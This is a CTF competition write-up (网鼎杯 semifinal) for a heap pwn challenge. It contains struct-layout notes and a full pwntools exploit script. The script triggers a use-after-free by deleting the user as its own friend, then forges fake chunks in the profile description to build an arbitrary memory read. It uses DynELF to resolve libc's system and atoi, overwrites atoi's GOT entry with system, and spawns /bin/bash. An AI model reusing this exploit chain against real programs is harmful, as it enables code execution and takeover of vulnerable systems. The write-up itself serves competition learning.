网鼎杯 半决赛 pwn writeup
# user (0x130, 0x128)
# [0, 8) name_p (size <= 0x1000)
# [8, 0x10) age
# [0x10, 0x110) description
# [0x110, 0x118) link_message_head
# [0x118, 0x120) friend
# [0x120, 0x128) valid or not
# message (0x20, 0x18)
# [0, 8) title_p (string_size+1 <= 0x1000)
# [8, 0x10) content_p (content_size+1 <= 0x1000)
# [0x10, 0x18) next_message_p
# register_user * 1
# -> login: user_0
# -> add_friend: user_0.friend = user_0
# -> delete_friend: user_0 (free self)
# -> show_profile (get current_name)
# -> send_message (to self, use current_name as name) (eat -0x10 ~ 0x10, name=current_name (0x10 ~ 0x30), content_length >=0x128)
# -> send_message (to self, use current_name as name) (eat 0x30 ~ 0x50)
# while DynELF:
# -> edit_profile (description = fake_current_name_chunk + fake_message_chunk) (second_message_address + p64(0x21) + current_name + padding + p64(0x21) + any_address)
# -> show_message (leak *any_address)
# -> lookup('system', 'libc')
# -> lookup('atoi', 'libc')
# -> logout
# -> register_user * 2 # 1, 2
# -> login: user_2
# -> add_friend: user_2.friend = user_2
# -> delete_friend: user_2 (free self)
# -> logout()
# -> register: 0x128, atoi_got (write user_2 memory, make name_p = atoi_got)
# -> login: atoi_address
# -> edit_profile (name = system_address)
# -> send: /bin/bash
from pwn import *
# Spawn the target binary locally; every helper below drives its text menu
# ("Your choice:" prompts) over this tube.
p = process('/home/qs/wangdingbei/pwn22')
def next():
    """Drain output up to the next menu prompt so the following send lands on a fresh choice.

    NOTE: this shadows the builtin ``next``; the name is kept because the
    helpers below call it.
    """
    prompt = 'Your choice:'
    p.recvuntil(prompt)
def register(name_size, name):
    """Menu option 2 (logged out): create a user.

    ``name_size`` is sent as a decimal line; ``name`` is sent raw with no
    newline, so the caller supplies any terminator. Age is fixed to '42' and
    the description to a single 'A'.
    """
    steps = (
        (p.sendlineafter, 'name size:', str(name_size)),
        (p.sendafter, 'name:', name),
        (p.sendlineafter, 'age:', '42'),
        (p.sendafter, 'description:', 'A'),
    )
    p.sendline('2')
    for send, prompt, data in steps:
        send(prompt, data)
    next()
def login(name):
    """Menu option 1 (logged out): log in as ``name``, sent raw without a newline."""
    choice, prompt = '1', 'name:'
    p.sendline(choice)
    p.sendafter(prompt, name)
    next()
def add_friend(name):
    """Menu option 3 with action 'a': add ``name`` (sent raw) as the current user's friend."""
    action = 'a'
    p.sendline('3')
    p.sendafter('name:', name)
    p.sendlineafter('(a/d)', action)
    next()
def delete_friend(name):
    """Menu option 3 with action 'd': remove ``name`` (sent raw) from the current user's friends."""
    action = 'd'
    p.sendline('3')
    p.sendafter('name:', name)
    p.sendlineafter('(a/d)', action)
    next()
def show_profile_get_username():
    """Menu option 1 (logged in, profile view): return the raw bytes printed as the username.

    The result is everything between 'Username:' and the following '\\nAge:'
    marker, with the marker dropped; no terminator is appended.
    """
    end_marker = '\nAge:'
    p.sendline('1')
    p.recvuntil('Username:')
    username = p.recvuntil(end_marker, drop=True)
    next()
    return username
def show_profile_get_description():
    """Menu option 1 (logged in, profile view): return the raw bytes printed as the description.

    Reads from 'Description:' up to the next menu line '1.view profile'
    (dropped); the bytes are returned as-is.
    """
    end_marker = '\n1.view profile'
    p.sendline('1')
    p.recvuntil('Description:')
    description = p.recvuntil(end_marker, drop=True)
    next()
    return description
def send_message(name, title, content):
    """Menu option 4: send a message; all three fields are sent raw with no newline added."""
    fields = (('to:', name), ('title:', title), ('content:', content))
    p.sendline('4')
    for prompt, data in fields:
        p.sendafter(prompt, data)
    next()
def show_message():
    """Menu option 5: return the raw title bytes of the entry listed as 'Message 2'.

    Output before the second message is skipped; the title is everything up to
    the '\\nContent:' marker, which is dropped.
    """
    p.sendline('5')
    for marker in ('Message 2', 'Title:'):
        p.recvuntil(marker)
    title = p.recvuntil('\nContent:', drop=True)
    next()
    return title
def edit_profile(name, age_str, description):
    """Menu option 2 (logged in): overwrite name, age and description.

    ``name`` and ``description`` are sent raw (no newline); ``age_str`` is
    sent as a line, so it must already be the textual form the binary parses.
    """
    steps = (
        (p.sendafter, 'name:', name),
        (p.sendlineafter, 'age:', age_str),
        (p.sendafter, 'description:', description),
    )
    p.sendline('2')
    for send, prompt, data in steps:
        send(prompt, data)
    next()
def logout():
    """Menu option 6: log out and wait for the next prompt."""
    choice = '6'
    p.sendline(choice)
    next()
context(log_level='debug')
# Phase 1 of the author's plan in the header: create user "0" (name size 2
# so the buffer holds '0' plus the explicit NUL that is sent with it) and log in.
register(2, '0\0')
login('0\0')
# Befriend the logged-in user with itself, then delete that friend; the header
# describes this as "delete_friend: user_0 (free self)" -- the session keeps
# using the record after it is released.
add_friend('0\0')
delete_friend('0\0')
# Whatever the profile view now prints as the username comes from that freed
# record; the header calls it current_name and reuses it as message recipient.
cur_name = show_profile_get_username()
# Two messages to self, as the header plan lists: the first with a content
# body of 0x128 bytes (the header requires content_length >= 0x128), the
# second small.
send_message(cur_name+'\0', cur_name, 'B'*0x128)
send_message(cur_name+'\0', 'A', 'B')
# The description bytes are decoded as an 8-byte little-endian value, padded
# with NULs if shorter; the header treats this as the second message's address.
second_message_address = u64(show_profile_get_description().ljust(8, '\0'))
def leak(address):
    """Read callback handed to pwntools' DynELF: return the bytes stored at ``address``.

    Rewrites the logged-in user's description with the fake-chunk layout from
    the header notes (second_message_address, a 0x21 size field, cur_name,
    padding, another 0x21 size field, then ``address`` in the message's
    title/content pointer slots) and reads the second message's title back.

    Args:
        address: absolute address in the target process to read from.

    Returns:
        The raw bytes the binary printed as that message's title, with one
        NUL appended (presumably so an empty print still yields a non-empty
        read for DynELF -- confirm against pwntools' expectations).
    """
    payload = p64(second_message_address) + p64(0x21) + cur_name
    # Pad so the second fake size field starts at offset 0x28 of the description.
    payload += 'A' * (0x28 - len(payload))
    payload += p64(0x21) + p64(address) + p64(address) + p64(0)
    # The age field is sent as the decimal form of second_message_address.
    edit_profile(cur_name, str(second_message_address), payload)
    content = show_message() + '\0'
    # Python 2 print statement; logs each read for debugging the leak.
    print '{} => {}'.format(hex(address), repr(content))
    return content
context(log_level='info')
# Let pwntools resolve libc symbols through the leak() read primitive above.
d = DynELF(leak, elf=ELF('/home/qs/wangdingbei/pwn22'))
system_address = d.lookup('system', 'libc')
atoi_address = d.lookup('atoi', 'libc')
logout()
context(log_level='debug')
# Phase 2 of the header plan: two fresh users, log in as "2", release its own
# record with the same self-friend/delete sequence, then log out.
register(2, '1\0')
register(2, '2\0')
login('2\0')
add_friend('2\0')
delete_friend('2\0')
logout()
# Fixed address of atoi's GOT slot; a constant like this only works when the
# binary is loaded at a fixed base (presumably non-PIE -- confirm with checksec).
atoi_got = 0x602060
# Per the header: a 0x128-byte name allocation lands in user_2's freed record,
# so its first 8 bytes (name_p in the layout notes) become atoi_got.
register(0x128, p64(atoi_got))
# Log in with the leaked atoi address as the name, then edit the name to
# system's address; per the header this writes through name_p into the GOT.
login(p64(atoi_address))
edit_profile(p64(system_address), '42', 'A')
# Final step of the header plan ("send: /bin/bash") followed by an interactive
# session on the tube.
p.sendline('/bin/bash\0')
p.interactive()